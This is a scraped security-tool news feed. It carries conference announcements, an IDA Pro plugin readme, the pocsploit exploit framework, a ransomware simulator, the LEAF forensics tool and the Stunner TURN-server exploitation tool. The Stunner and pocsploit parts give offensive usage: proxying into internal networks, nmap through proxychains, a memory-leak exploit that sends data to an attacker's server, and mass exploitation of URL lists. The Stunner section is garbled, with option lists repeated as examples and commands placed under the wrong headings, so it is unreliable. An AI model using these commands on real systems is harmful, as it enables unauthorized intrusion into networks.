FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Enumdb Beta – Brute Force MySQL and MSSQL Databases

Enumdb is brute force and post exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials. By...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Black Hat Arsenal USA 2018 – Call For Tools (Now Closed)

The Black Hat Arsenal team will once again provide hackers & security researchers the opportunity to demo their newest and latest code! The Arsenal tool demo area is dedicated to independent...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

T.rex_scan v0.2 – Integrate Tools to Audit Web Sites

T.rex_scan only facilitates the visualization when auditing a web page. With this script you can optimize your time, reducing the time you audit a page web since T.rex_scan executes the task you...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Purplemet Online Tool To Detect WebApp Technologies

Purplemet Security provides you an efficient and fast way to detect technologies used on web application as well their versions. It comes with 3 main features : Real-time PurplemetΒ technology...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Black Hat Arsenal USA 2018 The β€œw0w” Lineup !!

Just woow. Finally after few days of reviewing, selecting, unselecting, doubting, screaming and re-reviewing. The BlackhatΒ  & ToolsWatch team released the selected tools for the USA...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Recon Village @ DEFCON 2018 (Hackathon)

ToolsWatch likes open source tools, for that reason we will participate in the Recon Village @ DEF CON 2018 as part of jury. Maxi Soler will be there πŸ™‚ Recon Village is an Open Space with Talks,...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Blackhat Arsenal Europe 2018 CFT Open

The Black Hat Arsenal team is heading to London with the very same goal: give hackers & security researchers the opportunity to demo their newest and latest code. The Arsenal tool demo area is...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

HITB Armory – Call for Tools is OPEN! (Dubai, UAE)

We’re pleased to announce the first ever HackInTheBox Armory! The HITB Armory is where you can showcase your security tools to the world. You will get 30 minutes to present your tools onstage,...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Black Hat Arsenal Europe 2018 Lineup Announced

After days of reviewing the hundreds of submitted tools, ToolsWatch and Black Hat teams selected 50 tools. They will be demonstrated over 2 days the 5th and 6th of December 2018 at the Excel London...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Black Hat Arsenal Asia 2019 CFT Open

The Black Hat Arsenal team will be back in Singapore with the very same goal: give hackers & security researchers the opportunity to demo their newest and latest code. The Arsenal tool demo area...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Black Hat Arsenal Asia 2019 Lineup Announced

The Black Hat Arsenal event is back to Singapore after a successful session in London. In case you are attending the Blackhat Asia 2019, do not forget to stop by the Arsenal because we have selected...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Amazing Black Hat Arsenal USA 2019 Lineup Announced

After days of though reviewing, the whole Arsenal team has selected nearly 94 tools. Most of them will be released during the event. This USA session will introduce as well a new daily meet-up in the...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Introducing the 1st Arsenal Lab USA 2019

After several years of a dazzling success of the famous Black Hat Arsenal, the team has brainstormed to offer some new entertainment.Several ideas have been reviewed however the principle of an interactive hardware space was retained. So exclusively at the Black Hat Arsenal, we introduce the First Arsenal Lab USA 2019 on 2 consecutive days. [&hellip

Objective By The Sea & ToolsWatch To Organize The First Edition Of macOS β€œAloha” Armory (CLOSED)

We are extremely pleased and excited to announce our recent partnership with the renowned Objective By The Sea to promote a security & hacking tools demonstration area exclusively macOS oriented....

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Top 5 Critical CVEs Vulnerability from 2019 That Every CISO Must Patch Before He Gets Fired !

The number of vulnerabilities continues to increase so much that the technical teams in charge of the patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore we have taken the time to review the profile of the most critical vulnerabilities & issues that impacted year 2019. After this frenzy during [&hellip

CVE In The Hook – Monthly Vulnerability Review (January 2020 Issue)

Every day, new common vulnerabilities and exploits are publicly exposed. While this brings these flaws

CVE In The Hook – Monthly Vulnerability Review (February 2020 Issue)

Almost for as long as computers have been around, there have been vulnerabilities and individuals

vFeed, Inc. Introduces Vulnerability Common Patch Format Feature

New Feature !Vulnerability Common Patch Format vFeed Vulnerability Intelligence Service was created to provide correlation

Top 10 Most Exploited Vulnerabilities in 2020

We delved into the tons of vulnerability intelligence data we accumulated over the years. I

Top 10 Most Used MITRE ATT&CK Tactics & Techniques In 2020

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) is a curated knowledge base and model

Top Twenty Most Exploited Vulnerabilities in 2021

The number of vulnerabilities in 2021 have dramatically increased so that the technical teams in […]

FindFunc - Advanced Filtering/Finding of Functions in IDA Pro


FindFunc is an IDA Pro plugin to find code functions that contain a certain assembly or byte pattern, reference a certain name or string, or conform to various other constraints. This is not a competitor to tools like Diaphora or BinNavi, but it is ideal to find a known function in a new binary for cases where classical bindiffing fails.


Filtering with Rules

The main functionality of FindFunc is letting the user specify a set of "Rules" or constraints that a code function in IDA Pro has to satisfy. FF will then find and list all functions that satisfy ALL rules (so currently all Rules are in an AND-conjunction). Exception: Rules can be "inverted" to be negative matches. Such rules thus conform to "AND NOT".

FF will schedule the rules in a smart order to minimize processing time. Feature overview:

  • Currently 6 Rules available, see below
  • Code matching respects Addressing-Size-Prefix and Operand-Size-Prefix
  • Aware of function chunks
  • Smart scheduling of rules for performance
  • Saving/Loading rules from/to file in simple ascii format
  • Several independent Tabs for experimentation
  • Copying rules between Tabs via clipboard (same format as file format)
  • Saving entire session (all tabs) to file
  • Advanced copying of instruction bytes (all, opcodes only, all except immediates)

Button "Search Functions" clears existing results and starts a fresh search, "Refine Results" considers only results of the previous search.

Advanced Binary Copying

A secondary feature of FF is the option to copy binary representation of instructions with the following options:

  • copy all -> copy all bytes to the clipboard
  • copy without immediates -> blank out (AA ?? BB) any immediate values in the instruction bytes
  • opcode only -> will blank out everything except the actual opcode(s) of the instruction (and prefixes)

See "advanced copying" section below for details. This feature nicely complements the Byte Pattern rule!

Building and Installation

FindFunc is an IDA Pro python plugin without external package dependencies. It can be installed by downloading the repository and copying file findfuncmain.py and folder findfunc to your IDA Pro plugin directory. No building is required.

Requirements: IDA Pro 7.x (7.6+) with python3 environment. FindFunc is designed for x86/x64 architecture only. It has been tested with IDA 7.6/7.7, python 3.9 and IDAPython 7.4.0 on Windows 10.

Available Rules

Currently the following six rules are available. They are sorted here from heavy to light with regard to performance impact. With large databases it is a good idea to first cut down the candidate-functions with a cheap rule, before doing heavy matching via e.g. Code Rules. FF will automatically schedule rules in a smart way.

Code Pattern

Rule for filtering function based on them containing a given assembly code snippet. This is NOT a text-search for IDAs textual disassembly representation, but rather performs advanced matching of the underlying instruction. The snippet may contain many consecutive instructions, one per line. Function chunks are supported. Supports special wildcard matching, in addition to literal assembly:

  • "pass" -> matches any instruction with any operands
  • "mov* any,any" -> matches instructions with mnemonic "mov*" (e.g. mov, movzx, ...) and any two arguments.
  • "mov eax, r32" -> matches any instruction with mnemonic "mov", first operand register eax and second operand any 32-bit register.
    • Analogue: r for any register, r8/r16/r32/r64 for register of a specific width, "imm" for any immediate
  • "mov r64, imm" -> matches any move of a constant to a 64bit register
  • "any r64,r64" -> matches any operation between two 64bit registers
  • mov -> matches any instruction of mov mnemonic

more examples:

mov r64, [r32 * 8 + 0x100]
mov r, [r * 8 - 0x100]
mov r64, [r32 * 8 + imm]
pass
mov r, word [eax + r32 * 8 - 0x100]
any r64, r64
push imm
push any

Gotchas: Be careful when copying over assembly from IDA. IDA mingles local variable names and other information into the instruction which leads to matching failure. Also, labels are not supported ("call sub_123456").

Note that Code Patterns is the most expensive Rule, and if only Code Rules are present FF has no option but to disassemble the entire database. This can take up to several minutes for very large binaries. See notes on performance below.

Immediate Value (Constant)

The function must contain the given immediate at least once in any position. An immediate value is a value fixed in the binary representation of the instruction. Examples for instructions matching immediate value 0x100:

mov eax, 0x100
mov eax, [0x100]
and al, [eax + ebx*8 + 0x100]
push 0x100

Note: IDA performs extensive matching of any size and any position of the immediate. If you know it to be of a specific width of 4 or 8 bytes, a byte pattern can be a little faster.

Byte Pattern

The function must contain the given byte pattern at least once. The pattern is of the same format as IDAs binary search, and thus supports wildcards - the perfect match for the advanced-copy feature!

Examples:

11 22 33 44 aa bb cc
11 22 33 ?? ?? bb cc -> ?? can be any byte

Note: Pattern matching is quiet fast and a good candidate to cut down matches quickly!

String Reference

The function must reference the given string at least once. The string is matched according to pythons 'fnmatch' module, and thus supports wildcard-like matching. Matching is performed case-insensitive. Strings of the following formats are considered: [idaapi.STRTYPE_C, idaapi.STRTYPE_C_16] (this can be changed in the Config class).

Examples:

  • "TestString" -> function must reference the exact string (casing ignored) at least once
  • "TestStr*" -> function must reference a string starting with 'TestStr (e.g. TestString, TestStrong) at least once (casing ignored)

Note: String matching is fast and a good choice to cut down candidates quickly!

Name Reference

The function must reference the given name/label at least once. The name/label is matched according to pythons 'fnmatch' module, and thus supports wildcard-like matching. Matching is performed case-insensitive.

Examples:

  • "memset" -> function must reference a location named "memset" at least once
  • "mem*" -> function must reference a location starting with "mem" (memset, memcpy, memcmp) at least once

Note: Name matching is very fast and ideal to cut down candidates quickly!

Function Size

The size of the function must be within the given limit: "min <= functionsize <= max". Data is entered as a string of the form "min,max". The size of a function includes all of its chunks.

Note: Function size matching is very fast and ideal to cut down candidates quickly!

Keyboard Shortcuts & GUI

For ease of use FF can be used via the following keyboard shortcuts:

  • Ctrl+Alt+F -> launch/show TabWidget (main GUI)
    • Or View->FindFunc
  • Ctrl+F -> start search with currently enabled rules
  • Ctrl+R -> refine existing results with currently enabled rules
  • Rules
    • Ctrl+C -> copy selected rules to clipboard
    • Ctrl+V -> paste rules from clipboard into current tab (appends)
    • Ctrl+S -> save selected rules to file
    • Ctrl+L -> load selected rules from file (appends)
    • Ctrl+A -> select all rules
    • Del -> delete selected rules
  • Save Session
    • Ctrl+Shift+S -> Save session to file
    • Ctrl+Shift+L -> Load session from file

Further GUI usage

  • Rules can be edited by double-clicking the Data column
  • Rules can be inverted (negative match) by double-clicking the invert-match column
  • Rules can be enabled/disabled by double-clicking the enabled-column
  • Tabs can be renamed by double-clicking them
  • Sorting is supported both for Rule-List and Result-List
  • Double-click Result item to jump to it in IDA
    • function name: jump to function start
    • any other column: jump to match of last matched rule
  • Checkbox Profile: Outputs profiling information for the search
  • Checkbox Debug: Dumps detailed debugging output for code rule matching - only use it if few functions make it to the code checking rule, otherwise it might take very long!

Advanced Binary Copy

Frequently we want to search for binary patterns of assembly, but without hardcoded addresses and values (immediates), or even only the actual opcodes of the instruction. FindFunc makes this easy by adding three copy options to the disassembly-popupmenu:

Copy all bytes

Copies all instruction bytes as hex-string to clipboard, for use in a Byte-Pattern-Rule (or IDAs binary search).

B8 44332211      mov eax,11223344
68 00000001 push 1000000
66:894424 70 mov word ptr ss:[esp+70],ax

will be copied as

b8 44 33 22 11 68 00 00 00 01 66 89 44 24 70

Copy only non-immediate bytes

Copies instruction bytes for given instruction, masking out any immediate values. Example:

B8 44332211      mov eax,11223344
68 00000001 push 1000000
66:894424 70 mov word ptr ss:[esp+70],ax

will be copied as

b8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 89 44 24 ??

Copy only opcodes

Copy all instruction bytes as hex-string to clipboard, masking out any bytes that are not the actual opcode (including sib, modrm, but keeping legacy prefixes).

B8 44332211      mov eax,11223344
68 00000001 push 1000000
66:894424 70 mov word ptr ss:[esp+70],ax

will be copied as

b8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 89 ?? ?? ??

Note: This is a "best effort" using IDAs API, thus there may be few cases where it only works partially. For a 100% correct solution we would have to ship a dedicated x86 disasm library.

Similar results can be achieved with Code Pattern Rules, but this might be faster, both for user interaction and the actual search.

Copy disasm

Copies selected disassembly to clipboard, as it appears in IDA.

Performance

A brief word on performance:

  1. name, string, funcsize are almost free in all cases
  2. bytepattern is almost free for patterns length > 2
  3. immediate is difficult: We can use idaapi search, or we can disassemble the entire database and search ourselves - we may have to do this anyways if we are looking for code patterns. BUT: scanning for code patterns is in fact much cheaper than scanning for an immediate. An api-search for all matches is relatively costly - about 1/8 as costly as disassembling the entire database. So: If we cut down matches with cheap rules first, then we greatly profit from disassembling the remaining functions and looking for the immediate ourselves, especially if a code-rule is present anyways. However: If no cheap options exist and we have to disassemble large parts of the database anyways (due to presence of code pattern rules), then using one immediate rule as a pre-filter can greatly pay off. api-searching ONE immediate is roughly equivalent to 1/8 searching for any number of code-pattern rules - although this also depends on many different factors...
  4. code pattern are the most expensive by far, however checking one pattern vs checking many is very similar.

Todo (unordered):

  • jcc pseudo-mnemonic
  • Allow named locations in CodeRules ('call memset')
  • 'ignore all following operands' option
  • Rule for parameters to API calls inside function
  • Rule for parent/callsite/child function requirements
  • Rule for function parameters
  • Regex-rule
  • string/name: casing option
  • automatically convert immediate rules to byte pattern if applicable?
  • settings: case sensitivity, string types, range, ...
  • Hexray rules?
  • OR combination of rules
  • Pythonification of code ;)
  • Parallelization
  • Automatic generation of rules to identify a function?


Pocsploit - A Lightweight, Flexible And Novel Open Source Poc Verification Framework


pocsploit is a lightweight, flexible and novel open source poc verification framework

Pain points of the POC framework in the market

  1. There are too many params, I don't know how to get started, but only some of them are commonly used.
  2. YAML poc framework(like nuclei & xray) is not flexible enough. the conversion cost is very high when writing poc. Sometimes it's hard when encountering non-http protocols. (only hex can be used)
  3. Sometimes POC has false positives, which can be avoided by accurate fingerprint matching.
  4. It is heavily dependent on the framework. Poc in pocsploit can be used in the framework and can also be used alone.

Advantages of pocsploit

  1. Lighter, does not depend on the framework, a single poc can run
  2. Easier to rewrite Poc
  3. More flexible (compared to nuclei, xray, goby, etc.)
  4. Fewer false positives, providing fingerprint prerequisite judgment, you can first judge whether the site has the fingerprint of a certain component, and then perform POC verification, which is more accurate
  5. There are many ways to use, providing poc / exp
  6. Detailed vulnerability information display
  7. Poc ecological sustainability: I will continue to update the Poc to modules/, and welcome everyone to join us Contribute Poc

Encountered code/poc issues, please Submit issue

Poc Statistics

cve cnnvd others
345 7 102

Usage

Install requirements

pip3 install -r requirements.txt
  • poc to verify single website
python3 pocsploit.py -iS "http://xxxx/" -r "modules/" -t 100 --poc
  • specific poc
python3 pocslpoit.py -iS "http://xxxxx" -r "modules/vulnerabilities/thinkphp/thinkphp-5022-rce.py" --poc
  • exp to exploit many websites (with urls in a file)
python3 pocslpoit.py -iF "urls.txt" -r "modules/vulnerabilities/" --exp
  • Turn on fingerprint pre-verification, verify the fingerprint first, and then enter the poc verification after matching
python3 pocslpoit.py -iS "http://xxxxx" -r "modules/vulnerabilities/thinkphp/thinkphp-5022-rce.py" --poc --fp
  • Output to file & console quiet mode
python3 pocslpoit.py -iS "http://xxxx" -r "modules/vulnerabilities/" --poc -o result/result.log -q
  • Other Usage
python3 pocsploit.py --help



others

OOB

Please config conf/config.py

P.S. How to build your own DNSLog,please visit Hyuga-DNSLog

  • DNSLOG_URI: DNSLog Address
  • DNSLOG_TOKEN: Token
  • DNSLOG_IDENTIFY: your identity


Ransomware-Simulator - Ransomware Simulator Written In Golang


The goal of this repository is to provide a simple, harmless way to check your AV's protection on ransomware.

This tool simulates typical ransomware behaviour, such as:

  • Staging from a Word document macro
  • Deleting Volume Shadow Copies
  • Encrypting documents (embedded and dropped by the simulator into a new folder)
  • Dropping a ransomware note to the user's desktop

The ransomware simulator takes no action that actually encrypts pre-existing files on the device, or deletes Volume Shadow Copies. However, any AV products looking for such behaviour should still hopefully trigger.

Each step, as listed above, can also be disabled via a command line flag. This allows you to check responses to later steps as well, even if an AV already detects earlier steps.


Usage

Run command:
Run Ransomware Simulator

Usage:
ransomware-simulator run [flags]

Flags:
--dir string Directory where files that will be encrypted should be staged (default "./encrypted-files")
--disable-file-encryption Don't simulate document encryption
--disable-macro-simulation Don't simulate start from a macro by building the following process chain: winword.exe -> cmd.exe -> ransomware-simulator.exe
--disable-note-drop Don't drop pseudo ransomware note
--disable-shadow-copy-deletion Don't simulate volume shadow copy deletion
-h, --help help for run
--note-location string Ransomware note location (default "C:\\Users\\neo\\Desktop\\ransomware-simulator-note.txt")



LEAF - Linux Evidence Acquisition Framework


Linux Evidence Acquisition Framework (LEAF) acquires artifacts and evidence from Linux EXT4 systems, accepting user input to customize the functionality of the tool for easier scalability. Offering several modules and parameters as input, LEAF is able to use smart analysis to extract Linux artifacts and output to an ISO image file.


Usage

LEAF_master.py [-h] [-i INPUT [INPUT ...]] [-o OUTPUT] [-u USERS [USERS ...]] [-c CATEGORIES [CATEGORIES ...]] [-v]
[-s] [-g [GET_FILE_BY_OWNER [GET_FILE_BY_OWNER ...]]] [-y [YARA [YARA ...]]]
[-yr [YARA_RECURSIVE [YARA_RECURSIVE ...]]] [-yd [YARA_DESTINATIONS [YARA_DESTINATIONS...]]]

LEAF (Linux Evidence Acquisition Framework) - Cartware
____ _________ ___________ __________
/ / / _____/ / ____ / / ______/
/ / / /____ / /___/ / / /____
/ / / _____/ / ____ / / _____/
/ /_____ / /_____ / / / / / /
/_________/ /_________/ /___/ /___/ /___/ v2.0

Process Ubuntu 20.04/Debian file systems for forensic artifacts, extract important data, and export information to an ISO9660 file. Compatible with EXT4 file system and common locations on Ubuntu 20.04 operating system. See help page for more information. Suggested usage: Do not run from LEAF/ directory

Parameters

optional arguments:

-h, --help show this help message and exit

-i INPUT [INPUT ...], --input INPUT [INPUT ...]
Additional Input locations. Separate multiple input files with spaces
Default: /home/user1/Desktop/LEAF-3/target_locations

-o OUTPUT, --output OUTPUT

Output directory location

Default: ./LEAF_output

-u USERS [USERS ...], --users USERS [USERS ...]

Users to include in output, separated by spaces (i.e. -u alice bob root).
Users not present in /etc/passwd will be removed
Default: All non-service users in /etc/passwd
-c CATEGORIES [CATEGORIES ...], --categories CATEGORIES [CATEGORIES ...]< br/> Explicit artifact categories to include during acquisition.
Categories must be separated by space, (i.e. -c network users apache).
Full List of built-in categories includes:
APPLICATIONS, EXECUTIONS, LOGS, MISC, NETWORK, SHELL, STARTUP, SERVICES, SYSTEM, TRASH, USERS
Categories are compatible with user-inputted files as long as they follow the notation:
# CATEGORY
/location1
/location2
.../location[n]
# END CATEGORY
Default: "all"
-v, --verbose Output in verbose mode, (may conflict with progress bar)
Default: False
-s, --save Save the raw evidence directory
Default: False
-g [GET_ OWNERSHIP [GET_OWNERSHIP ...]], --get_ownership [GET_OWNERSHIP [GET_OWNERSHIP ...]]
Get files and directories owned by included users.
Enabling this will increase parsing time.
Use -g alone to parse from / root directory.
Include paths after -g to specify target locations (i.e. "-g /etc /home/user/Downloads/
Default: Disabled
-y [YARA [YARA ...]], --yara [YARA [YARA ...]]
Configure Yara IOC scanning. Select -y alone to enable Yara scanning.
Specify '-y /path/to/yara/' to specify custom input location.
For multiple inputs, use spaces between items,
i.e. '-y rulefile1.yar rulefile2.yara rule_dir/'
All yara files m ust have ".yar" or ".yara" extension.
Default: None
-yr [YARA_RECURSIVE [YARA_RECURSIVE ...]], --yara_recursive [YARA_RECURSIVE [YARA_RECURSIVE ...]]
Configure Recursive Yara IOC scanning.
For multiple inputs, use spaces between items,
i.e. '-yr rulefile1.yar rulefile2.yara rule_dir/'.
Directories in this list will be scanned recursively.
Can be used in conjunction with the normal -y flag,
but intersecting directories will take recursive priority.
Default: None
-yd [YARA_DESTINATIONS [YARA_DESTINATIONS...]], --yara_destinations [YARA_DESTINATIONS [YARA_DESTINATIONS...]]
Destination to run yara files against.
Separate multiple targets with a space.(i.e. /home/alice/ /bin/star/)
Default: All user directories

Example Usages:

To use default arguments [this will use default input file (./target_locations), users (all users), categories (all categories), and output location (./LEAF_output/). Cloned data will not be stored in a local directory, verbose mode is off, and yara scanning is disabled]:
LEAF_main.py

All arguments:
LEAF_main.py -i /home/alice/Desktop/customfile1.txt -o /home/alice/Desktop/ExampleOutput/ -c logs startup services apache -u alice bob charlie -s -v -y /path/to/yara_rule1.yar -yr /path2/to/yara_rules/ -yd /home/frank -g /etc/

To specify usernames, categories, and yara files:
LEAF_main.py -u alice bob charlie -c applications executions users -y /home/alice/Desktop/yara1.yar /home/alice/Desktop/yara2.yar

To include custom input file(s) and categories:
LEAF_main.py -i /home/alice/Desktop/customfile1.txt /home/alice/Desktop/customfile2.t xt -c apache xampp

How to Use

  • Install Python requirements:
    • Python 3 (preferably 3.8 or higher) (apt install python3)
    • pip 3 (apt install pip3)
  • Download required modules
    • Install modules from requirements.txt (pip3 install -r requirements.txt)
    • If you get an installation error, try sudo -H pip3 install -r requirements.txt
  • Run the script
    • sudo python3 LEAF_master.py with optional arguments


Stunner - Tool To Test And Exploit STUN, TURN And TURN Over TCP Servers


Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC).

If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.

I developed this tool during a test of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/post/multiple_vulnerabilities_cisco_expressway/

To get the required username and password you need to fetch them using an out-of-band method like sniffing the Connect request from a web browser with Burp. I added an example workflow at the bottom of the readme on how you would test such a server.


LICENSE

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

implemented RFCs

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156

Available Commands

info

This command will print some info about the stun or turn server like supported protocols and attributes like the used software.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --timeout value               connect timeout to turn server (default: 1s)  --help, -h                    show help (default: false)  

Example

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--timeout value connect timeout to turn server (default: 1s)
--help, -h show help (default: false)

range-scan

This command tries several private and restricted ranges to see if the TURN server is configured to allow connections to the specified IP addresses. If a specific range is not prohibited you can enumerate this range further with the other provided commands. If an ip is reachable it means the TURN server will forward traffic to this IP.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --help, -h                    show help (default: false)  

Example

TCP based TURN connection (connection from you the TURN server):

./stunner info -s x.x.x.x:443

UDP based TURN connection (connection from you the TURN server):

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--protocol value protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value connect timeout to turn server (default: 1s)
--username value, -u value username for the turn server
--password value, -p value password for the turn server
--help, -h show help (default: false)

socks

This is one of the most useful commands for TURN servers that support TCP connections to backend servers. It will launch a local socks5 server with no authentication and will relay all TCP traffic over the TURN protocol (UDP via SOCKS is currently not supported). If the server is misconfuigured it will forward the traffic to internal adresses so this can be used to reach internal systems and abuse the server as a proxy into the internal network. If you choose to also do DNS lookups over socks, it will be resolved using your local nameserver so it's best to work with private IPv4 and IPv6 addresses. Please be aware that this module can only relay TCP traffic.

Options

certificates via the connection. (default: true) --help, -h show help (default: false)">
--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --listen value, -l value      Address and port to listen on (default: "127.0.0.1:1080")  --drop-public, -x             Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser want's to check TLS certificates via the connection. (default: true)  --help, -h                    show help (default: false)  

Example

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

After starting the proxy open your browser, point the proxy in your settings to socks5 with an ip of 127.0.0.1:1080 (be sure to not set the bypass local address option as we want to reach the remote local addresses) and call the IP of your choice in the browser.

Example: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (those will call the ports on the tested TURN server from the local interfaces).

You can also configure proxychains to use this proxy (but it will be very slow as each request results in multiple requests to enable the proxying). Just edit /etc/proxychains.conf and enter the value socks5 127.0.0.1 1080 under ProxyList.

Example of nmap over this socks5 proxy with a correct configured proxychains (note it's -sT to do TCP syns otherwise it will not use the socks5 proxy)

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

brute-transports

This will most likely yield no useable information but can be useful to enumerate all available transports (=protocols to internal systems) supported by the server. This might show some custom protocol implementations but mostly will only return the defaults.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --help, -h                    show help (default: false)  

Example

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--protocol value protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value connect timeout to turn server (default: 1s)
--username value, -u value username for the turn server
--password value, -p value password for the turn server
--listen value, -l value Address and port to listen on (default: "127.0.0.1:1080")
--drop-public, -x Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser want's to check TLS certificates via the connection. (default: true)
--help, -h show help (default: false)

memoryleak

This attack works the following way: The server takes the data to send to target (must be a high port > 1024 in most cases) as a TLV (Type Length Value). This exploit uses a big length with a short value. If the server does not check the boundaries of the TLV, it might send you some memory up the length to the target. Cisco Expressway was confirmed vulnerable to this but according to cisco it only leaked memory of the current session.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --target value, -t value      Target to leak memory to in the form host:port. Should be a public server under your control  --size value                  Size of the buffer to leak (default: 35510)  --help, -h                    show help (default: false)  

Example

To receive the data we need to set up a receiver on a server with a public ip. Normally firewalls are configured to only allow highports (>1024) from TURN servers so be sure to use a high port like 8080 in this example when connecting out to the internet.

./stunner socks -s x.x.x.x:3478 -u username -p password -x

then execute the following statement on your machine adding the public ip to the t parameter

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1

If it works you should see big loads of memory coming in, otherwise you will only see short messages.

udp-scanner

If a TURN server allows UDP connections to targets this scanner can be used to scan all private ip ranges and send them SNMP and DNS requests. As this checks a lot of IPs this can take multiple days to complete so use with caution or specify smaller targets via the parameters. You need to supply a SNMP community string that will be tried and a domain name that will be resolved on each IP. For the domain name you can for example use burp collaborator.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --community-string value      SNMP community string to use for scanning (default: "public")  --domain value                domain name to resolve on internal DNS servers during scanning  --ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)  --help, -h                    show help (default: false)  

Example

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--protocol value protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value connect timeout to turn server (default: 1s)
--username value, -u value username for the turn server
--password value, -p value password for the turn server
--help, -h show help (default: false)

tcp-scanner

Same as udp-scanner but sends out HTTP requests to the specified ports (HTTPS is not supported)

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --ports value                 Ports to check (default: "80,443,8080,8081")  --ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)  --help, -h                    show help (default: false)  

Example

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

Example workflow

Let's say you find a service using WebRTC and want to test it.

First step is to get the required data. I suggest to launch Wireshark in the background and just join a meeting via Burp to collect all HTTP and Websocket traffic. Next search your burp history for some keywords related to TURN like 3478, password, credential and username (be sure to also check the websocket tab for these keywords). This might reveal the turn server and the protocol (UDP and TCP endpoints might have different ports) and the credentials used to connect. If you can't find the data in burp start looking at wireshark to identify the traffic. If it's on a non standard port (anything else then 3478) decode the protocol in Wireshark via a right click as STUN. This should show you the username used to connect and you can use this information to search burps history even further for the required data . Please note that Wireshark can't show you the password as the password is used to hash some package contents so it can not be reversed.

Next step would be to issue the info command to the turn server using the correct port and protocol obtained from burp.

If this works, the next step is a range-scan. If this allows any traffic to internal systems you can exploit this further but be aware that UDP has only limited use cases.

